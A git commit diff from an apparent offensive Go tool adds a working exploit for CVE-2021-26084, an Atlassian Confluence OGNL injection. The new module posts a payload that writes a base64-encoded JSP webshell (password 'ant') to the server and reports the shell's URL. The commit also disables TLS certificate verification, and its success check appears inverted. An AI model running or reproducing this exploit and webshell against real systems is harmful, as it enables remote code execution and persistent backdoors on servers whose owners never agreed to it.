支持CVE-2021-26084漏洞利用，利用成功默认上传蚁剑

Author: SummerSec

.gitignore

@@ -6,4 +6,5 @@ logs.txt
 **.zip
 **.tar.gz
 target.txt
-result.txt
+result.txt
+**.py

README.md

@@ -19,9 +19,12 @@
 
 * [x] 添加支持CVE-2022-22947 (Spring Cloud Gateway SpELRCE)
 * [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE)
+* []  添加支持CVE-2021-26084 (Atlassian Confluence RCE)
+* []  添加支持CVE-2022-22965 (Spring Core RCE)
 * [x] 自定义并发
 * [x] 自定义输出日志位置
 * [x] 自定义结果输出位置
+* 
 
 ………
 

cmd/commons/attack/attack.go

@@ -28,8 +28,10 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {
 	log.Debug("[*] Add PoC")
 	// TODO 添加poc
 	//pocs["demo"] = &poc.Demo{}
-	pocs["CVE202222947"] = &poc.CVE202222947{}
-	pocs["CVE202222963"] = &poc.CVE202222963{}
+	//pocs["CVE202222947"] = &poc.CVE202222947{}
+	//pocs["CVE202222963"] = &poc.CVE202222963{}
+	pocs["CVE202126084"] = &poc.CVE202126084{}
+	//pocs["CVE202222965"] = &_022.CVE202222965{}
 	return pocs
 
 }

cmd/commons/core/options.go

@@ -58,7 +58,7 @@ func ParseOptions() *Options {
 	flag.Parse()
 
 	// TODO 修改版本号
-	v := "0.0.4"
+	v := "0.0.5"
 
 	if options.Version {
 		//ShowBanner(v)

cmd/commons/poc/CVE-2021-26084.go

@@ -0,0 +1,66 @@
+package poc
+
+import (
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	"github.com/fatih/structs"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+	"net/url"
+)
+
+type CVE202126084 struct{}
+
+func (p CVE202126084) SendPoc(target string, hashmap map[string]interface{}) {
+	reqinfo := NewReqInfo()
+	reqmap := structs.Map(reqinfo)
+	u := target + "pages/doenterpagevariables.action"
+	shell := "PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmEuaW8uKixqYXZhLnV0aWwuemlwLioiJT4NCjwlIQ0KICBjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXIgew0KICAgIFUoQ2xhc3NMb2FkZXIgYykgew0KICAgICAgc3VwZXIoYyk7DQogICAgfQ0KICAgIHB1YmxpYyBDbGFzcyBnKGJ5dGVbXSBiKSB7DQogICAgICByZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoYiwgMCwgYi5sZW5ndGgpOw0KICAgIH0NCiAgfQ0KICBwdWJsaWMgYnl0ZVtdIGRlY29tcHJlc3MoYnl0ZVtdIGRhdGEpIHsNCiAgICBieXRlW10gb3V0cHV0ID0gbmV3IGJ5dGVbMF07DQogICAgSW5mbGF0ZXIgZGMgPSBuZXcgSW5mbGF0ZXIoKTsNCiAgICBkYy5yZXNldCgpOw0KICAgIGRjLnNldElucHV0KGRhdGEpOw0KICAgIEJ5dGVBcnJheU91dHB1dFN0cmVhbSBvID0gbmV3IEJ5dGVBcnJheU91dHB1dFN0cmVhbShkYXRhLmxlbmd0aCk7DQogICAgdHJ5IHsNCiAgICAgIGJ5dGVbXSBidWYgPSBuZXcgYnl0ZVsxMDI0XTsNCiAgICAgIHdoaWxlICghZGMuZmluaXNoZWQoKSkgew0KICAgICAgICBpbnQgaSA9IGRjLmluZmxhdGUoYnVmKTsNCiAgICAgICAgby53cml0ZShidWYsIDAsIGkpOw0KICAgICAgfQ0KICAgICAgb3V0cHV0ID0gby50b0J5dGVBcnJheSgpOw0KICAgIH0gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7DQogICAgICAgIG91dHB1dCA9IGRhdGE7DQogICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgfSBmaW5hbGx5IHsNCiAgICAgIHRyeSB7DQogICAgICAgICAgby5jbG9zZSgpOw0KICAgICAgfSBjYXRjaCAoSU9FeGNlcHRpb24gZSkgew0KICAgICAgICAgIGUucHJpbnRTdGFja1RyYWNlKCk7DQogICAgICB9DQogICAgfQ0KICAgIGRjLmVuZCgpOw0KICAgIHJldHVybiBvdXRwdXQ7DQogIH0NCiAgcHVibGljIGJ5dGVbXSBiYXNlNjREZWNvZGUoU3RyaW5nIHN0cikgdGhyb3dzIEV4Y2VwdGlvbiB7DQogICAgdHJ5IHsNCiAgICAgIENsYXNzIGNsYXp6ID0gQ2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RGVjb2RlciIpOw0KICAgICAgcmV0dXJuIChieXRlW10pIGNsYXp6LmdldE1ldGhvZCgiZGVjb2RlQnVmZmVyIiwgU3RyaW5nLmNsYXNzKS5pbnZva2UoY2xhenoubmV3SW5zdGFuY2UoKSwgc3RyKTsNCiAgICB9IGNhdGNoIChFeGNlcHRpb24gZSkgew0KICAgICAgQ2xhc3MgY2xhenogPSBDbGFzcy5mb3JOYW1lKCJqYXZhLnV0aWwuQmFzZTY0Iik7DQogICAgICBPYmplY3QgZGVjb2RlciA9IGNsYXp6LmdldE1ldGhvZCgiZ2V0RGVjb2RlciIpLmludm9rZShudWxsKTsNCiAgICAgIHJldHVybiAoYnl0ZVtdKSBkZWNvZGVyLmdldENsYXNzKCkuZ2V0TWV0aG9kKCJkZWNvZGUiLCBTdHJpbmcuY2xhc3MpLmludm9rZShkZWNvZGVyLCBzdHIpOw0KICAgIH0NCiAgfQ0KJT4NCjwlDQogIFN0cmluZyBjbHMgPSByZXF1ZXN0LmdldFBhcmFtZXRlcigiYW50Iik7DQogIGlmIChjbHMgIT0gbnVsbCkgew0KICAgIG5ldyBVKHRoaXMuZ2V0Q2xhc3MoKS5nZXRDbGFzc0xvYWRlcigpKS5nKGRlY29tcHJlc3MoYmFzZTY0RGVjb2RlKGNscykpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7DQogIH0NCiU+"
+	// DoRunning.jsp
+	data := "queryString=\\u0027%2b#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var b64Shell=\\u0027" + url.QueryEscape(shell) + "\\u0027;var shell=new java.lang.String(java.util.Base64.getDecoder().decode(b64Shell));var f=new java.io.FileOutputStream(new java.io.File(\\u0027../confluence/testAnt.jsp\\u0027));f.write(shell.getBytes());f.close();\\u0022)}%2b\\u0027"
+	reqmap["url"] = u
+	reqmap["method"] = "POST"
+	reqmap["body"] = data
+	reqmap["headers"] = map[string]string{
+		"User-Agent":   utils.GetUA(),
+		"Content-Type": "application/x-www-form-urlencoded",
+	}
+
+	// 默认配置
+	reqmap["timeout"] = hashmap["Timeout"].(int)
+	reqmap["retry"] = hashmap["Retry"].(int)
+	reqmap["proxy"] = hashmap["Proxy"].(string)
+	reqmap["mode"] = hashmap["Mode"].(int)
+
+	file := hashmap["Out"].(string)
+	utils.Send(reqmap)
+
+	reqmap["url"] = target + "DoRnning.jsp"
+	reqmap["body"] = "pass"
+
+	resp := utils.Send(reqmap)
+
+	if p.checkExp(resp, target, file) {
+		context := target + " 存在CVE-2021-26084漏洞！" + target + "testAnt.jsp 蚁剑密码 ant "
+		log.Info(context)
+		p.saveResult(target, file)
+	}
+
+}
+
+func (CVE202126084) init() {
+	log.Debugf("CVE-2021-26084 init")
+}
+
+func (CVE202126084) saveResult(target string, file string) {
+	utils.SaveToFile(target, file)
+}
+
+func (CVE202126084) checkExp(resp *req.Response, target string, file string) bool {
+	if !resp.IsSuccess() {
+		log.Debugf(resp.Dump())
+		return true
+	}
+
+	return false
+
+}

cmd/commons/utils/httpclient.go

@@ -16,7 +16,7 @@ func InIt(mode int, timeout int, proxy string, retry int) (client *req.Client) {
 	// 设置超时时间
 	client.SetTimeout(time.Duration(timeout) * time.Second)
 	client.SetCommonRetryCount(retry)
-	client.DisableInsecureSkipVerify()
+	client.EnableInsecureSkipVerify()
 	// 设置代理
 	f := IsProxyUrl(proxy)
 	if f {